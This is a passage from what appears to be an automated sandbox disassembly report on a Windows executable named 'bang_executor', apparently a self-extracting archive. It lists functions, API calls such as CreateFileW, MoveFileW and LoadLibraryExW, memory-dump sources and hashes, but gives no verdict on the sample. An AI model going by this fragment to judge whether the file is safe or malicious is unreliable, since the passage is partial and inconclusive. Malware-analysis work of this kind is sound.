4fec28-4fec2b 1019->1028 1022->891 1031 4fee69 1022->1031 1032 4fee70-4fee72 1023->1032 1034 4fec2f-4fec5b call 4e4c00 GetFileAttributesW 1028->1034 1030->985 1031->1032 1032->989 1045 4fec2d-4fec2e 1034->1045 1046 4fec5d-4fec73 MoveFileW 1034->1046 1043->871 1045->1034 1046->993 1049 4fec75-4fec7f MoveFileExW 1046->1049 1047->1009 1054 4febbf-4febff call 506433 call 502640 SHFileOperationW 1047->1054 1048->1047 1048->1054 1049->993 1054->1017
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 004FF1A7
                                          • Part of subcall function 004ED52F: _wcslen.LIBCMT ref: 004ED535
                                        • _swprintf.LIBCMT ref: 004FF1DC
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(?,00000066,00534892), ref: 004FF1F5
                                        • EndDialog.USER32(?,00000001), ref: 004FF30F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                        • String ID: %s%s%u
                                        • API String ID: 110358324-1360425832
                                        • Opcode ID: 43790be50380ab992c614aa32c3bba53cad7ee2431eb4aa89ddc76211bd2fea4
                                        • Instruction ID: db7365aa38144f75e0db9b0835c2449c337ce25672705d9044480a05cf1a1c52
                                        • Opcode Fuzzy Hash: 43790be50380ab992c614aa32c3bba53cad7ee2431eb4aa89ddc76211bd2fea4
                                        • Instruction Fuzzy Hash: 94515F7650428DABDF31DBA18C45BFF37ACBF19304F440427EA09DA151EB789649CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • OleInitialize.OLE32(00000000), ref: 004FCCF2
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004FCD29
                                        • SHGetMalloc.SHELL32(0052C460), ref: 004FCD33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3To
                                        • API String ID: 3498096277-2168385784
                                        • Opcode ID: b886fb1605cad97c7633602491039a9874b6ae57549cbb8deff35f4c2eb71e52
                                        • Instruction ID: 61408213aa80722c6cb84f372c92f80c1c028a22758232cd0e65d79b14bae059
                                        • Opcode Fuzzy Hash: b886fb1605cad97c7633602491039a9874b6ae57549cbb8deff35f4c2eb71e52
                                        • Instruction Fuzzy Hash: BAF049B5D0020DABCB10AF9AD8499EFFFFCEF95704F00405AE405A2241CBB856498FA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB2B0 Relevance: 7.6, APIs: 5, Instructions: 119filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1063 4eb2b0-4eb2ea call 501590 1066 4eb2ec-4eb2ef 1063->1066 1067 4eb2f5 1063->1067 1066->1067 1068 4eb2f1-4eb2f3 1066->1068 1069 4eb2f7-4eb308 1067->1069 1068->1069 1070 4eb30a 1069->1070 1071 4eb310-4eb31a 1069->1071 1070->1071 1072 4eb31f-4eb32c call 4e7eed 1071->1072 1073 4eb31c 1071->1073 1076 4eb32e 1072->1076 1077 4eb334-4eb34d CreateFileW 1072->1077 1073->1072 1076->1077 1078 4eb34f-4eb36e GetLastError call 4eda1e 1077->1078 1079 4eb39b-4eb39f 1077->1079 1083 4eb3a8-4eb3ad 1078->1083 1085 4eb370-4eb393 CreateFileW GetLastError 1078->1085 1081 4eb3a3-4eb3a6 1079->1081 1081->1083 1084 4eb3b9-4eb3be 1081->1084 1083->1084 1086 4eb3af 1083->1086 1087 4eb3df-4eb3f0 1084->1087 1088 4eb3c0-4eb3c3 1084->1088 1085->1081 1089 4eb395-4eb399 1085->1089 1086->1084 1091 4eb40b-4eb424 call 5010f9 1087->1091 1092 4eb3f2-4eb407 call 4f268b 1087->1092 1088->1087 1090 4eb3c5-4eb3d9 SetFileTime 1088->1090 1089->1081 1090->1087 1092->1091
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,004E8846,?,00000005), ref: 004EB342
                                        • GetLastError.KERNEL32(?,?,004E8846,?,00000005), ref: 004EB34F
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,004E8846,?,00000005), ref: 004EB382
                                        • GetLastError.KERNEL32(?,?,004E8846,?,00000005), ref: 004EB38A
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004E8846,?,00000005), ref: 004EB3D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 75cba299c376ba9872c2e4ecb1be14a7a9f73140ef36904b8e28a1be04622079
                                        • Instruction ID: b5efa7b19048606311dbf6804461c6df09e759f40f2a4903aef5d7f44a6bc7fe
                                        • Opcode Fuzzy Hash: 75cba299c376ba9872c2e4ecb1be14a7a9f73140ef36904b8e28a1be04622079
                                        • Instruction Fuzzy Hash: 544125305057856FD320DF25CC4A7EBBBD4FB48321F100A1AF9A1962C0D3B8A948CBDA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD864 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1139 4fd864-4fd87d PeekMessageW 1140 4fd87f-4fd893 GetMessageW 1139->1140 1141 4fd8b8-4fd8ba 1139->1141 1142 4fd895-4fd8a2 IsDialogMessageW 1140->1142 1143 4fd8a4-4fd8b2 TranslateMessage DispatchMessageW 1140->1143 1142->1141 1142->1143 1143->1141
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                        • IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                        • TranslateMessage.USER32(?), ref: 004FD8A8
                                        • DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: d225f370ec18b39752bf4b8c13a4515a7ebbffbc1afc122338d4d45ba34c3e46
                                        • Instruction ID: 12a0c700adff7064f1fcbfb0f73fb03b5a16404c1c3abfe5bc303c85f777491d
                                        • Opcode Fuzzy Hash: d225f370ec18b39752bf4b8c13a4515a7ebbffbc1afc122338d4d45ba34c3e46
                                        • Instruction Fuzzy Hash: A8F03075D0221DABDF20ABE5DC0CDEB7F7CEE1A2957004411B61AD2100E728D509CBF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1144 4fcb49-4fcb72 GetClassNameW 1145 4fcb9a-4fcb9c 1144->1145 1146 4fcb74-4fcb89 call 4f4168 1144->1146 1147 4fcb9e-4fcba1 SHAutoComplete 1145->1147 1148 4fcba7-4fcbb3 call 5010f9 1145->1148 1152 4fcb8b-4fcb97 FindWindowExW 1146->1152 1153 4fcb99 1146->1153 1147->1148 1152->1153 1153->1145
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 004FCB6A
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 004FCBA1
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004FCB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 61656ac2ecd7468a41587d7190948e5049809a6ca87129f7937e264fc6bb5bb6
                                        • Instruction ID: 45bd3bc4911aef529c51211d63e76871b1c952f6acd6de24a5716ad630dda5d7
                                        • Opcode Fuzzy Hash: 61656ac2ecd7468a41587d7190948e5049809a6ca87129f7937e264fc6bb5bb6
                                        • Instruction Fuzzy Hash: 27F0CD3560131CBBD7209B259D0AFAF77AC9F9A704F000055BA45B7180D774EE498569
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FFFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00500038
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: ed49217af4a244d42a1a602647f7b9a5da8e2cc0fd0dcb5128dd67f17800b928
                                        • Instruction ID: 9b8752be4a3cbff9727eaa8046ba1617d20074ac38ce711b773455e0040693d9
                                        • Opcode Fuzzy Hash: ed49217af4a244d42a1a602647f7b9a5da8e2cc0fd0dcb5128dd67f17800b928
                                        • Instruction Fuzzy Hash: ECF0F671901238BBD720ABA08C1AAFF7B9CFF1DB40B40441ABD41971C1DAF49D80DAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00506232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,005061E3,00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx), ref: 0050623F
                                        • GetLastError.KERNEL32(?,005061E3,00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx,00000000,?,0050613D), ref: 00506249
                                        • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00505083), ref: 00506271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID: api-ms-
                                        • API String ID: 3177248105-2084034818
                                        • Opcode ID: ee6dbbccdfaf30161d07b4101724f9c74f51118d2ab6e3c9966222ee4a3b3610
                                        • Instruction ID: c0617a810757b006a5d05b8f024eaf8ed1003f37b37f97d3617bcd37f4130195
                                        • Opcode Fuzzy Hash: ee6dbbccdfaf30161d07b4101724f9c74f51118d2ab6e3c9966222ee4a3b3610
                                        • Instruction Fuzzy Hash: 86E04F38680305B7EF101F60EC0AF9D3F69BF10B51F108420F91DA80E1EBB199A4A585
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB151 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB161
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB179
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB1AB
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB1CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 4b26ca64f6c392af4c518982f699d3fdcdaefe91ce7f175bcfa748ea7db509b2
                                        • Instruction ID: c3275bdb2e458408e6e672b33c1dc746dcb32a9255ad8473b4e057e6c5f955b1
                                        • Opcode Fuzzy Hash: 4b26ca64f6c392af4c518982f699d3fdcdaefe91ce7f175bcfa748ea7db509b2
                                        • Instruction Fuzzy Hash: FA11A330500244EBDB219B22CC1866BB7A9FB553F3F10862BE85685290DB78DE44DBD9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0050688D,00000000,00000000,?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue), ref: 0050D3B6
                                        • GetLastError.KERNEL32(?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue,0051AC00,FlsSetValue,00000000,00000364,?,0050BA77), ref: 0050D3C2
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue,0051AC00,FlsSetValue,00000000), ref: 0050D3D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 8ad3c801757d610e8f4897a1b63dcdf627e412d22c5135e3869f3b98e5d6b800
                                        • Instruction ID: b35ddd27a064b46fd87cd6eb33c951d0380546e1d078ee745683a5a0f722f8b8
                                        • Opcode Fuzzy Hash: 8ad3c801757d610e8f4897a1b63dcdf627e412d22c5135e3869f3b98e5d6b800
                                        • Instruction Fuzzy Hash: F101A736651326ABCB218FA9AC44ADB7F68FF157A17154E20F91BD71C0DB20D805CAF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050E077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0050B9A5: GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                          • Part of subcall function 0050B9A5: _free.LIBCMT ref: 0050B9DC
                                          • Part of subcall function 0050B9A5: SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                          • Part of subcall function 0050B9A5: _abort.LIBCMT ref: 0050BA23
                                          • Part of subcall function 0050E19E: _abort.LIBCMT ref: 0050E1D0
                                          • Part of subcall function 0050E19E: _free.LIBCMT ref: 0050E204
                                          • Part of subcall function 0050DE0B: GetOEMCP.KERNEL32(00000000,?,?,0050E094,?), ref: 0050DE36
                                        • _free.LIBCMT ref: 0050E0EF
                                        • _free.LIBCMT ref: 0050E125
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: p,R
                                        • API String ID: 2991157371-400878132
                                        • Opcode ID: 27c9dd83f49aeefaa2dbf487e799e549a984cacc454650ea1d20d8c4166f25f0
                                        • Instruction ID: 81ba2615a3443463c1c8e191861781356161db55e66718c62e58c41e407c0a65
                                        • Opcode Fuzzy Hash: 27c9dd83f49aeefaa2dbf487e799e549a984cacc454650ea1d20d8c4166f25f0
                                        • Instruction Fuzzy Hash: 6431A431904209AFEB10EFA9D48AAAD7FF5FF81320F354499E5049B2D1DBB25D41DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F3105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 004F3129
                                        • SetThreadPriority.KERNEL32(00000000,00000000), ref: 004F3170
                                          • Part of subcall function 004E7BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E7BD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2655393344-3849766595
                                        • Opcode ID: e0a1cae6a8351b25cd0cb796b09b656815c886b19504efd0903d0d279e135d3d
                                        • Instruction ID: 98f5de1dcd8758cf9b3d0c44bc6ae0f24583feec416e0aed6d90867d6357acd5
                                        • Opcode Fuzzy Hash: e0a1cae6a8351b25cd0cb796b09b656815c886b19504efd0903d0d279e135d3d
                                        • Instruction Fuzzy Hash: DC01F27224870A6FD2206F51AC45FB677E8EF52727F20012EF782561C1DAA0A8458668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050AABA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0050E580: GetEnvironmentStringsW.KERNEL32 ref: 0050E589
                                          • Part of subcall function 0050E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050E5AC
                                          • Part of subcall function 0050E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0050E5D2
                                          • Part of subcall function 0050E580: _free.LIBCMT ref: 0050E5E5
                                          • Part of subcall function 0050E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0050E5F4
